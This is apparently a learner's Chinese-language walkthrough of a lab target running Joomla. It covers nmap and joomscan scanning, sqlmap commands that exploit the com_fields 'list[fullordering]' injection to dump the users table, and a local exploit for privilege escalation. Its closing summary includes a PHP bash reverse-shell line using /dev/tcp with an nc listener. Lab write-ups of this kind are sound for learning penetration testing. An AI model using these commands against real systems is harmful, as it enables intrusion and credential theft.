探测主机IP
探测开放端口,nmap -A简单扫一下详细信息
框架好像是用的joomla,一会可以用这个框架的专用扫描器扫扫
进它的首页看看
先不管这么多,我们已经找到登入点了,之前我们用nmap扫出此网站用的框架是joomla
用专门扫它的工具试试
安装joomscan工具的命令是sudo apt-get install joomscan
装完开扫
Sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]爆字段
sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump爆数据
可以尝试拿shell了
访问主页,kali监听
提权
这个exp之前好像用过,试试这个
好像要去下一个33972的压缩包,然后里面有exp
那去下载吧
总结:
- joomla框架有个专门的扫描器,kali没预装安装命令sudo apt-get install joomscan
- 知道了框架版本可以搜索框架版本漏洞,安装教程一步一步复现
- Php反弹shell语句今天忘了怎么写,可以用这个system("bash ‐c 'bash ‐i >& /dev/tcp/ip/端口 0>&1'"); 执行后nc监听一下端口
- 提权的话找系统漏洞一个个试,github上下载exp,wget频繁报错ssl失败什么的,网上说可以修改hosts文件,或者加--no-check-certificate --no-cookie等参数,但是我研究了几个小时,到最后都没解决,最后是在本机上找到一个可以下载的地方下载了扔过去的
- 有框架尽量去寻找前人的智慧,毕竟我是个小菜鸡,真要一个个试慢慢挖估计得很久很久